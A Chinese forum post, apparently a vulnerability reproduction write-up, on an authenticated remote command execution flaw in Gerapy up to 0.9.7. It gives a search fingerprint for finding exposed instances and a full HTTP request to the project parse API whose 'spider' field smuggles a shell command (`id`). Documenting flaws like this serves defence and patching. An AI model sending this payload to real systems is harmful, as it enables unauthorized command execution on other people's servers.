问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Gerapy parse 后台远程命令执行漏洞
# Gerapy parse 后台远程命令执行漏洞 ## 漏洞描述 Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞 ## 漏洞影响 G...
Gerapy parse 后台远程命令执行漏洞 ======================= 漏洞描述 ---- Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞 漏洞影响 ---- Gerapy <= 0.9.7 网络测绘 ---- title="Gerapy" 漏洞复现 ---- 登录页面 ![img](https://shs3.b.qianxin.com/butian_public/f515665eaaede9bc2d8b9d2c434cfdc7bf85fccaa7cb9.jpg) 出现漏洞的文件为 `gerapy/server/core/views.py` ![img](https://shs3.b.qianxin.com/butian_public/f208036efded5cf1e881d955fc9053897943ff467ebcc.jpg) 构造请求包测试命令执行 ```python POST /api/project/1/parse HTTP/1.1 Host: Pragma: no-cache Cache-Control: no-cache Accept: application/json, text/plain, */* Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Content-Length: 18 {"spider":";`id`"} ``` ![img](https://shs3.b.qianxin.com/butian_public/f56239629c78c3cd6858233d4e636c2bcde23c8ab7b38.jpg)
发表于 2024-07-12 18:46:04
阅读 ( 979 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!